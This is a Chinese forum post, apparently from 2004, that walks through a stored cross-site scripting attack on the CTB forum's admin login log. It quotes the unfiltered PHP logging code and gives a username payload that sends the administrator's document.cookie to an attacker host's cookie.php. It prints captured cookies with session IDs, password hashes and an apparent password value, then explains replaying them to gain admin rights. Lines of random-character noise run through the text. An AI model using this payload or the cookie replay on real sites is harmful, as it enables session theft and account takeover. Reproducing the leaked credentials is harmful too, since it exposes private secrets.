数学建模社区-数学中国
标题:
CTB论坛再探
[打印本页]
作者:
韩冰
时间:
2004-10-6 12:02
标题:
CTB论坛再探
在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看,可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中,我们可以通过递交特殊的语句来进行跨站攻击,从而直接得到密码。
% H% c9 h; C+ L" f; F9 M
5 b3 Y! ^- x( H r" r
我们看看admin目录下的login.php文件的日志处理部分的代码:
6 K& f) o, n, g" H+ U
9 G8 r) P6 o! w. F% P x
代码:
; V5 D& b y j* w9 K' C+ Q
--------------------------------------------------------------------------------
' A& v$ S4 S! i8 M# i3 ^( X
6 e: {1 h- Z; F$ P+ g
//后台管理员登陆日志
5 F7 v" M. ^# k3 R5 Z
function adminLoginLog($check="ok")
; Y- D9 Q& ]; `6 p& c( N! O
{
1 B' v# A. z# I' S5 r" k# f a
if($this->set[logRecord] == "N"){
8 w. w3 J1 p" \ }+ ?2 g
return false;
$ j) e! Q' X" F9 \1 w/ G
}
& d0 R( r& F1 t0 f2 s
$msgArray[phpCode] = $this->code;
9 H5 E0 s4 g6 |0 a) ?# G+ M
//判断文件大小是否需要清空
& y% i. J) J/ Q8 x1 k
if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){
/ ]7 k& v7 Z. l* x
$this->file = "../".$this->set['dataPath']."/log_adminlogin.php";
: _6 h& o0 `9 j7 @ r. Z) y% F
$this->null_write("");
. T3 }- X6 \; h0 V) `
}
& G Z- g, w2 r: A% e* P) O
//登陆错误
7 a$ b7 r% d; ~* n% `8 x% E$ i" r! k
//省去部分代码........
- u3 ]1 F6 \9 o$ @- x. F9 ] u
//登陆失败
2 I% O+ C+ z; w$ p; N
else {
. N( `2 H0 o5 X7 ~
$msgArray[loginMode] = 0;
7 A" G. I( R' D' E; D
$msgArray[loginId] = $this->input['userName'];
$ Q/ e: T) j3 i/ \( J( |
$msgArray[wrongMsg] = $check;
, U0 r* S! n4 [+ e! A
$msgArray[userIp] = $this->ip;
: B$ q" ], \% N$ N5 q
$msgArray[loginTime] = time();
' X* r2 F. o) W% t/ C1 r$ N
$msgArray[temp1] = ""; //备用
' p: W1 x& H5 _; }+ C
$msgArray[temp2] = ""; //备用
: x7 \% }0 B$ V. g
$this->file = "../".$this->set['dataPath']."/log_adminlogin.php";
- e: K2 c7 m2 i) p
$this->add_line($msgArray);
. k$ ~8 ~* _5 G6 q _3 l
}
* J; {! R) X2 I1 V, `8 ~
}
+ i, I5 i% P7 V; B7 ?
( m- T- v' b1 E5 g. |; H
--------------------------------------------------------------------------------
8 e" ?0 o' y2 |8 r( I2 M
$ `, k z% i% o' }% k: e; q
从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去,当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息,我们也就可以通过这个方法来得到管理员的ID和密码等信息。
2 X& m0 z$ U* K4 X% {' |( N
: y9 j( V1 z6 v4 }) b( p3 y! p" V6 w
我们打开后台登陆页面,在用户名那里输入:
/ u% p, p0 j& d, o* b$ R
" X4 {) Z# s8 ]$ [ j0 m8 W4 j
代码:
/ U0 g+ f/ O) Q# h
--------------------------------------------------------------------------------
- ]: {7 @$ F/ B/ w+ x) d0 G! M) e
2 J) D T2 s( h6 U. U( r c
<img src="javascript:window.open('http://192.168.1.1/cookie.php?'+document.cookie)">
4 T$ c7 b0 g- U5 p- q4 M
9 ^! W/ T# ~1 G0 b* ?
--------------------------------------------------------------------------------
' v8 L4 G2 i- w9 W# |
$ d$ D2 e) Z0 |+ C+ b
因为无论登陆成功否,程序都会进行记录,所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址,cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了,只要管理员一查看后台登陆日志,我们的PHP程序就会把他的COOKIE截取下来。
k3 I' I" d/ I6 U0 d, u4 J, i
7 {4 X- X( _6 T" d0 {( m/ @. ]
让我们看看截取到的文件内容:
* b$ R- \& v& f' r% f: g1 [% F
9 B N- X8 a K
引用:
! t8 D5 S! ?& b7 n
--------------------------------------------------------------------------------
# A9 K( d# m! ]- R; w1 S( d
- h/ P1 ] {/ `, y8 t* Y8 j+ T+ y/ z
ctb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503
% q; _# [1 X0 k5 O# _3 I+ J
) k% x0 c2 v" y9 g2 d( s
--------------------------------------------------------------------------------
* W; b/ @- a7 r6 ^
: ?, I, F; L# E d: m" f5 v
我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了,有了这些信息,我们要获得前台管理员权限就非常容易,用IECookieView找到我们要编辑的COOKIE,把相应的部分替换掉,保存后再进入该站点你就是前台管理员了。
8 ~/ c) z' o, p: |
: ?; c" o- m& p; z% E
很简单的我们就得到了论坛的管理权限,如果被人利用,那么相信后果是非常严重的,希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况,尽快修补该漏洞,以免造成不必要的损失。
+ M7 O. ^4 I9 P, t' W7 Y2 \
欢迎光临 数学建模社区-数学中国 (http://www.madio.net/)
Powered by Discuz! X2.5